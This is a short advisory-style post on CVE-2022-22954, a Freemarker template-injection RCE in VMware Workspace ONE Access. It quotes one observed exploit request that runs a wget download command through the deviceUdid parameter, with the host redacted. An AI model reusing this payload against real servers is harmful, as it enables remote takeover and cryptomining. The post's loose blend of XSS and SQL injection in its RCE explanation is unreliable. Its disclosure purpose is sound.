CVE-2022-22954 VMware Workspace ONE Access and Identity Manager – remote code execution vulnerability
VMware Workspace ONE Access and identity Manager has been affected by a remote code execution vulnerability. Remote Code Execution (RCE) vulnerabilities are used by attackers to gain access to a target system from remote locations. This can be done by using an existing injection mechanism within a product, for example PHP or SQL requests that can be found when retrieving data from a server, but instead the attacker can manipulate this by embedding their own code through XSS or SQL injection methods which gets interpreted by the selected language and processed. By processing this code, the attacker can either inject malicious code within the product or retrieve sensitive information.
In VMware’s particular case, attackers are able to inject this code through the use of a server-side template and use it to infect servers for cryptocurrency mining. A server-side template is something that is used when user input is embedded in a template of some form and is processed by the target application. So in this case, a server-side template utility called ‘Freemarker’ can be exploited and used to inject code within this product. An example of it, from Bad Packets, seen below, shows this in detail.
“GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=${\”freemarker.template.utility.Execute\”?new()(\”wget -U \”Hello 1.0\” -qO – (RCE)”)} HTTP/1.1”
As for a resolution to this vulnerability, VMWare states to apply the latest patches. This is a Critical level vulnerability scoring a 10 on the CVSS Score.
